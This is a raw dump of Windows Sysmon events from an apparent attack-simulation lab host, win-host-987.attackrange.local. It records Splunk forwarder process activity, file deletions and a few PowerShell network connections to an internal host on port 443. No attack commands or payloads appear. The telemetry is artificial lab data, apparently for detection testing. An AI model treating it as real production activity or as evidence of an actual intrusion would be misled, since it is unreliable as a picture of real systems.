Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A0E4-6140-8256-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0E4-6140-8256-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.880{B81B27B7-A0E4-6140-8256-04000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.449{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E9CBCF445C0277147CF6D670F2DDFB4A,SHA256=A698A1AAF1F3462CD30BA905D55617AA8CC99B1C6D4EC5CBCF64B68B2FF7682B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.418{B81B27B7-A0E4-6140-8156-04000000C801}71122324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0E4-6140-8156-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0E4-6140-8156-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.218{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0E4-6140-8156-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.203{B81B27B7-A0E4-6140-8156-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.018{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653639254A4A0D9E98B55F7BACB2EA91,SHA256=D56760CC65B868B9E77143A571E1C3082360082032C1B0898DA5372E1E57C6B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:55.118{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50533-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:25.217{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68A8C9915C15827B467948CBBA5C962E,SHA256=B554638F2BF3B478B07ECA4DEC0B1C83A1B2E17DE0815F0A10CF7E2149697545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:25.217{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03A862BC5AA4308B0599CD14BEA41AD9,SHA256=2CD2FB7863DE45642FA1942D639DB3D70C121A27A975A68208451DDA05DE829B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:25.048{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F1A3318F87E930F97EB2B917D86090D,SHA256=B6CDC3D72AB9D911CB88A9505826E96527F054F4C989CD382CCE3E208D127B5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:55.917{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50534-false10.0.1.12-8000- 23542300x800000000000000036497480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:26.081{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B225AC17CAC3BF476E086183BB5849,SHA256=24C02B5F06514C7A1295078D36839EA22FB5760BD2E153B71824D05686221805,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:27.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68A8C9915C15827B467948CBBA5C962E,SHA256=B554638F2BF3B478B07ECA4DEC0B1C83A1B2E17DE0815F0A10CF7E2149697545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:27.099{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B92BB4C8C93E7D45D9A774B8246F8011,SHA256=7D1B27255E09C6B830F1347F9F963250A282A95D9BBD2529C30FE567A1FBA32E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:28.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB399616FA7FE0565456715541280183,SHA256=7E694A829D8101F46C9E03A8FFC6E26719E4577123155EE50C679E531DD22C0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:29.627{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=594718D38099533E015094E457901927,SHA256=E2A10ADE62216CD7A932524E83B8A0EEAD0E4E4EC7CE41D23EAE492D16EF1DBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:29.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=988D66476F94B16F7CEC3C70A89717F8,SHA256=69E807199B5CD51C7742FF0BFC4106C275E1C55134ADB30979ECC1BF4CEEC31C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:00.128{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50535-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:30.176{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAE7FAE5BE8E275018623283ACEBAFB9,SHA256=D25BE87FC08927D6FB90BAC06E061ADDB13E2915FA7534F36404C4ABE6421325,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:31.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB3E097A417CADB5B4A68CE2864E9585,SHA256=A66679C29ACD1AC4566CDADC9B28CDA2B070B99D3BA587CEC5BCD23DC7E63463,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:01.925{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50536-false10.0.1.12-8000- 23542300x800000000000000036497491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:32.539{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:32.208{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A43BD5A9922FF2989D611C5FFD8FD35,SHA256=50D13E730106844249E31D1C290CC5CBB8B97853940A2FDD2734AD38234614E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:33.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A399E827461D8279FC7A3C8855E067C8,SHA256=0BF2F0FB61EF27177F2AC1B9DD58506DF8B4FF9DBA1B568CB6E67E92EEB8B219,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:33.223{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55EAE3C030D681BE70BB8940425C1A73,SHA256=4C0B5FF48DB226CCC2E5008BD995E1B9F6BCB559796EC601AF0BB32AAE2D881F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:34.237{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=377AA4D5B2C9ED401A2D002AB0D61D7F,SHA256=FF14D949BF8E1827FF2C682A33C9AF86C45076E5C19D43450FE721A3173E24E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 